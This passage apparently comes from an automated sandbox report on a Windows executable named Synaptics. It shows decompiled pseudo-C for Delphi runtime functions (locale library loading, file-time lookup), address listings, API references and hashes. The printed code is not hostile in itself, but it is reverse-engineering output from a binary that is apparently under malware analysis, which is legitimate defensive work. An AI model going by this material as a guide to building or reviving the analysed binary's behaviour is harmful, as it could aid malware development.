							if( *(__eax + 4) == 0) {
								__eax = E004598AC(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00451600( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00459744();
							} else {
								_v8 = E0045974C(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004598AC(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004077A8();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004598AC(__ebp);
							} else {
								__eax = E004598E8(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00456FEC(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004598AC(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E0041AC6C( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                                                                                                                                                                                                            0x00459934
                                                                                                                                                                                                                            0x0045993b
                                                                                                                                                                                                                            0x0045993d
                                                                                                                                                                                                                            0x00459940
                                                                                                                                                                                                                            0x00459945
                                                                                                                                                                                                                            0x00459946
                                                                                                                                                                                                                            0x0045994b
                                                                                                                                                                                                                            0x0045994e
                                                                                                                                                                                                                            0x00459956
                                                                                                                                                                                                                            0x00459965
                                                                                                                                                                                                                            0x00459968
                                                                                                                                                                                                                            0x0045999c
                                                                                                                                                                                                                            0x004599a2
                                                                                                                                                                                                                            0x004599aa
                                                                                                                                                                                                                            0x004599ac
                                                                                                                                                                                                                            0x004599ae
                                                                                                                                                                                                                            0x004599b1
                                                                                                                                                                                                                            0x00459a65
                                                                                                                                                                                                                            0x00459a6a
                                                                                                                                                                                                                            0x00459abb
                                                                                                                                                                                                                            0x00459ac0
                                                                                                                                                                                                                            0x00459ae1
                                                                                                                                                                                                                            0x00459ae1
                                                                                                                                                                                                                            0x00459ae6
                                                                                                                                                                                                                            0x00459f56
                                                                                                                                                                                                                            0x00459f59
                                                                                                                                                                                                                            0x00459f5d
                                                                                                                                                                                                                            0x00459f79
                                                                                                                                                                                                                            0x00459f5f
                                                                                                                                                                                                                            0x00459f6b
                                                                                                                                                                                                                            0x00459f6b
                                                                                                                                                                                                                            0x00459fe4
                                                                                                                                                                                                                            0x00459fe4
                                                                                                                                                                                                                            0x00459fe6
                                                                                                                                                                                                                            0x00459fe9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fe9
                                                                                                                                                                                                                            0x00459aef
                                                                                                                                                                                                                            0x00459af2
                                                                                                                                                                                                                            0x00459db1
                                                                                                                                                                                                                            0x00459af8
                                                                                                                                                                                                                            0x00459fdd
                                                                                                                                                                                                                            0x00459fde
                                                                                                                                                                                                                            0x00459fe3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459af2
                                                                                                                                                                                                                            0x00459ac2
                                                                                                                                                                                                                            0x00459f1d
                                                                                                                                                                                                                            0x00459f20
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459f4c
                                                                                                                                                                                                                            0x00459f26
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00459f34
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459f24
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459ac8
                                                                                                                                                                                                                            0x00459acd
                                                                                                                                                                                                                            0x00459ecb
                                                                                                                                                                                                                            0x00459ed0
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ed8
                                                                                                                                                                                                                            0x00459edd
                                                                                                                                                                                                                            0x00459ee0
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00459eeb
                                                                                                                                                                                                                            0x00459ef0
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef9
                                                                                                                                                                                                                            0x00459ef2
                                                                                                                                                                                                                            0x00459ee3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ed2
                                                                                                                                                                                                                            0x00459ad3
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459f03
                                                                                                                                                                                                                            0x00459f13
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459adc
                                                                                                                                                                                                                            0x00459ad6
                                                                                                                                                                                                                            0x00459a6c
                                                                                                                                                                                                                            0x00459dde
                                                                                                                                                                                                                            0x00459de1
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459de9
                                                                                                                                                                                                                            0x00459ded
                                                                                                                                                                                                                            0x00459df2
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00459e02
                                                                                                                                                                                                                            0x00459e07
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459e17
                                                                                                                                                                                                                            0x00459e1c
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e24
                                                                                                                                                                                                                            0x00459e2b
                                                                                                                                                                                                                            0x00459e3a
                                                                                                                                                                                                                            0x00459e53
                                                                                                                                                                                                                            0x00459e59
                                                                                                                                                                                                                            0x00459e5e
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e68
                                                                                                                                                                                                                            0x00459e1e
                                                                                                                                                                                                                            0x00459e09
                                                                                                                                                                                                                            0x00459df4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459de3
                                                                                                                                                                                                                            0x00459a72
                                                                                                                                                                                                                            0x00459a77
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa2
                                                                                                                                                                                                                            0x00459aa7
                                                                                                                                                                                                                            0x00459e9c
                                                                                                                                                                                                                            0x00459e9f
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00459eb9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ea7
                                                                                                                                                                                                                            0x00459aad
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459dbf
                                                                                                                                                                                                                            0x00459dc4
                                                                                                                                                                                                                            0x00459dc6
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00459dcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ab6
                                                                                                                                                                                                                            0x00459ab0
                                                                                                                                                                                                                            0x00459a79
                                                                                                                                                                                                                            0x00459e74
                                                                                                                                                                                                                            0x00459e77
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00459e91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459e7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a7f
                                                                                                                                                                                                                            0x00459a84
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b08
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459b1b
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b0f
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00459b28
                                                                                                                                                                                                                            0x00459b16
                                                                                                                                                                                                                            0x00459b33
                                                                                                                                                                                                                            0x00459b38
                                                                                                                                                                                                                            0x00459b14
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b0d
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a89
                                                                                                                                                                                                                            0x00459a8c
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459cc0
                                                                                                                                                                                                                            0x00459a92
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x00459fbf
                                                                                                                                                                                                                            0x00459fc4
                                                                                                                                                                                                                            0x00459fc6
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00459fcd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a9d
                                                                                                                                                                                                                            0x00459a97
                                                                                                                                                                                                                            0x004599b7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004599bd
                                                                                                                                                                                                                            0x004599c0
                                                                                                                                                                                                                            0x00459a2c
                                                                                                                                                                                                                            0x00459a2f
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a4e
                                                                                                                                                                                                                            0x00459a51
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b9e
                                                                                                                                                                                                                            0x00459a57
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459ce4
                                                                                                                                                                                                                            0x00459cea
                                                                                                                                                                                                                            0x00459cf0
                                                                                                                                                                                                                            0x00459cf6
                                                                                                                                                                                                                            0x00459cf9
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00459d06
                                                                                                                                                                                                                            0x00459d09
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d90
                                                                                                                                                                                                                            0x00459d12
                                                                                                                                                                                                                            0x00459d21
                                                                                                                                                                                                                            0x00459d26
                                                                                                                                                                                                                            0x00459d2c
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d78
                                                                                                                                                                                                                            0x00459d80
                                                                                                                                                                                                                            0x00459d30
                                                                                                                                                                                                                            0x00459d35
                                                                                                                                                                                                                            0x00459d4c
                                                                                                                                                                                                                            0x00459d4e
                                                                                                                                                                                                                            0x00459d50
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d5b
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d69
                                                                                                                                                                                                                            0x00459d52
                                                                                                                                                                                                                            0x00459d2e
                                                                                                                                                                                                                            0x00459d10
                                                                                                                                                                                                                            0x00459d00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a60
                                                                                                                                                                                                                            0x00459a5a
                                                                                                                                                                                                                            0x00459a31
                                                                                                                                                                                                                            0x00459fa7
                                                                                                                                                                                                                            0x00459fac
                                                                                                                                                                                                                            0x00459fb2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fb7
                                                                                                                                                                                                                            0x00459a37
                                                                                                                                                                                                                            0x00459a37
                                                                                                                                                                                                                            0x00459a3a
                                                                                                                                                                                                                            0x00459f87
                                                                                                                                                                                                                            0x00459f8e
                                                                                                                                                                                                                            0x00459f99
                                                                                                                                                                                                                            0x00459f9f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fa4
                                                                                                                                                                                                                            0x00459a40
                                                                                                                                                                                                                            0x00459a43
                                                                                                                                                                                                                            0x00459bc8
                                                                                                                                                                                                                            0x00459bce
                                                                                                                                                                                                                            0x00459bd1
                                                                                                                                                                                                                            0x00459bd5
                                                                                                                                                                                                                            0x00459bdb
                                                                                                                                                                                                                            0x00459be1
                                                                                                                                                                                                                            0x00459be4
                                                                                                                                                                                                                            0x00459be8
                                                                                                                                                                                                                            0x00459c0f
                                                                                                                                                                                                                            0x00459c24
                                                                                                                                                                                                                            0x00459bea
                                                                                                                                                                                                                            0x00459bed
                                                                                                                                                                                                                            0x00459c02
                                                                                                                                                                                                                            0x00459c02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a49
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459a49
                                                                                                                                                                                                                            0x00459a43
                                                                                                                                                                                                                            0x004599c2
                                                                                                                                                                                                                            0x00459cc8
                                                                                                                                                                                                                            0x00459ccb
                                                                                                                                                                                                                            0x00459ccf
                                                                                                                                                                                                                            0x00459cd8
                                                                                                                                                                                                                            0x00459cd8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ccf
                                                                                                                                                                                                                            0x004599c8
                                                                                                                                                                                                                            0x004599cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004599d1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459fd6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459ba6
                                                                                                                                                                                                                            0x00459ba8
                                                                                                                                                                                                                            0x00459baa
                                                                                                                                                                                                                            0x00459bb2
                                                                                                                                                                                                                            0x00459bb5
                                                                                                                                                                                                                            0x00459bb6
                                                                                                                                                                                                                            0x00459bbc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459c2e
                                                                                                                                                                                                                            0x00459c31
                                                                                                                                                                                                                            0x00459c35
                                                                                                                                                                                                                            0x00459c69
                                                                                                                                                                                                                            0x00459c6f
                                                                                                                                                                                                                            0x00459c72
                                                                                                                                                                                                                            0x00459c79
                                                                                                                                                                                                                            0x00459c7b
                                                                                                                                                                                                                            0x00459c7e
                                                                                                                                                                                                                            0x00459c81
                                                                                                                                                                                                                            0x00459c86
                                                                                                                                                                                                                            0x00459c89
                                                                                                                                                                                                                            0x00459c89
                                                                                                                                                                                                                            0x00459c92
                                                                                                                                                                                                                            0x00459c37
                                                                                                                                                                                                                            0x00459c3a
                                                                                                                                                                                                                            0x00459c3f
                                                                                                                                                                                                                            0x00459c42
                                                                                                                                                                                                                            0x00459c48
                                                                                                                                                                                                                            0x00459c4a
                                                                                                                                                                                                                            0x00459c51
                                                                                                                                                                                                                            0x00459c54
                                                                                                                                                                                                                            0x00459c54
                                                                                                                                                                                                                            0x00459c56
                                                                                                                                                                                                                            0x00459c56
                                                                                                                                                                                                                            0x00459c5d
                                                                                                                                                                                                                            0x00459c62
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b56
                                                                                                                                                                                                                            0x00459b59
                                                                                                                                                                                                                            0x00459b5c
                                                                                                                                                                                                                            0x00459b5d
                                                                                                                                                                                                                            0x00459b62
                                                                                                                                                                                                                            0x00459b64
                                                                                                                                                                                                                            0x00459b73
                                                                                                                                                                                                                            0x00459b66
                                                                                                                                                                                                                            0x00459b67
                                                                                                                                                                                                                            0x00459b6c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b3e
                                                                                                                                                                                                                            0x00459b41
                                                                                                                                                                                                                            0x00459b44
                                                                                                                                                                                                                            0x00459b46
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00459b4c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00459b7e
                                                                                                                                                                                                                            0x00459b81
                                                                                                                                                                                                                            0x00459b88
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996a
                                                                                                                                                                                                                            0x0045996b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045996d
                                                                                                                                                                                                                            0x00459989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998b
                                                                                                                                                                                                                            0x0045998d
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x00459990
                                                                                                                                                                                                                            0x0045a003
                                                                                                                                                                                                                            0x0045a009
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459998
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x00459999
                                                                                                                                                                                                                            0x0045999a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045999a

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                                                                                                            • API String ID: 0-2963190186
                                                                                                                                                                                                                            • Opcode ID: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                                                            • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 474 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 475 406313-406317 474->475 476 4063f6-4063fd 474->476 477 406323-406339 lstrlen 475->477 478 406319-40631d 475->478 479 40633c-40633f 477->479 478->476 478->477 480 406341-406349 479->480 481 40634b-406353 479->481 480->481 482 40633b 480->482 481->476 483 406359-40635e 481->483 482->479 484 406360-406386 lstrcpyn LoadLibraryExA 483->484 485 406388-40638a 483->485 484->485 485->476 486 40638c-406390 485->486 486->476 487 406392-4063c2 lstrcpyn LoadLibraryExA 486->487 487->476 488 4063c4-4063f4 lstrcpyn LoadLibraryExA 487->488 488->476
                                                                                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                                                                                            			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                                                                                                                                                            0x004062dc
                                                                                                                                                                                                                            0x004062e4
                                                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                                                            0x004062ec
                                                                                                                                                                                                                            0x004062ff
                                                                                                                                                                                                                            0x00406304
                                                                                                                                                                                                                            0x0040630d
                                                                                                                                                                                                                            0x004063f6
                                                                                                                                                                                                                            0x004063fd
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406323
                                                                                                                                                                                                                            0x00406329
                                                                                                                                                                                                                            0x0040632a
                                                                                                                                                                                                                            0x00406337
                                                                                                                                                                                                                            0x0040633c
                                                                                                                                                                                                                            0x0040633f
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040633b
                                                                                                                                                                                                                            0x0040634b
                                                                                                                                                                                                                            0x00406353
                                                                                                                                                                                                                            0x00406359
                                                                                                                                                                                                                            0x0040635e
                                                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                                                            0x0040636f
                                                                                                                                                                                                                            0x00406370
                                                                                                                                                                                                                            0x00406371
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x00406386
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x004063a3
                                                                                                                                                                                                                            0x004063a7
                                                                                                                                                                                                                            0x004063a8
                                                                                                                                                                                                                            0x004063a9
                                                                                                                                                                                                                            0x004063b9
                                                                                                                                                                                                                            0x004063be
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x004063c4
                                                                                                                                                                                                                            0x004063d9
                                                                                                                                                                                                                            0x004063dd
                                                                                                                                                                                                                            0x004063de
                                                                                                                                                                                                                            0x004063df
                                                                                                                                                                                                                            0x004063ef
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063f4
                                                                                                                                                                                                                            0x004063c2
                                                                                                                                                                                                                            0x0040638a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406353

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                            • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                            • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16); // executed
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                                                                                                                                                                                            0x004099fb
                                                                                                                                                                                                                            0x00409a03
                                                                                                                                                                                                                            0x00409a39
                                                                                                                                                                                                                            0x00409a39
                                                                                                                                                                                                                            0x00409a05
                                                                                                                                                                                                                            0x00409a06
                                                                                                                                                                                                                            0x00409a12
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409a14
                                                                                                                                                                                                                            0x00409a1f
                                                                                                                                                                                                                            0x00409a37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409a37
                                                                                                                                                                                                                            0x00409a12
                                                                                                                                                                                                                            0x00409a47

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872,?,00000000), ref: 004099FB
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872), ref: 00409A06
